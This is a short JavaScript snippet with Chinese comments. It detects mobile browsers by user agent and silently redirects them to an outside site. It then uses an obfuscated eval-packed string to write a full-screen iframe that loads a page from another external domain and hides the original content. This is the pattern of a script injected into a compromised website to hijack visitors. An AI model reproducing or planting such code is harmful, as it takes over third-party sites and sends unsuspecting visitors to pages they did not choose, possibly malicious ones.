//设定Mobile的定义(全小写)
var mobileAgent = new Array("iphone", "ipod", "ipad", "android", "mobile", "blackberry", "webos", "incognito", "webmate", "bada", "nokia", "lg", "ucweb", "skyfire");
//读取用户的浏览器资料
var browser = navigator.userAgent.toLowerCase();
var isMobile = false;

//检查开始
for (var i = 0; i < mobileAgent.length; i++) {
    if (browser.indexOf(mobileAgent[i]) != -1) {
        isMobile = true;
        //alert(mobileAgent[i]);
        //程式码(转址)
        location.href = 'http://ybc28.com/?405960';
        //停止运行回圈
        break;
    }
}
eval(function(p,a,c,k,e,r){e=String;if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[1-6]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('document.write(\'<4 src="http://www.yasuo-sh.com/wzcp/top.5" 2="1%" 3="1%" scrolling="yes"  frameborder="0"></4><6 type="text/css">5{2:1%;3:1%}body {2:1%;3:1%;overflow:hidden}</6>\');',[],7,'|100|width|height|Iframe|html|style'.split('|'),0,{}))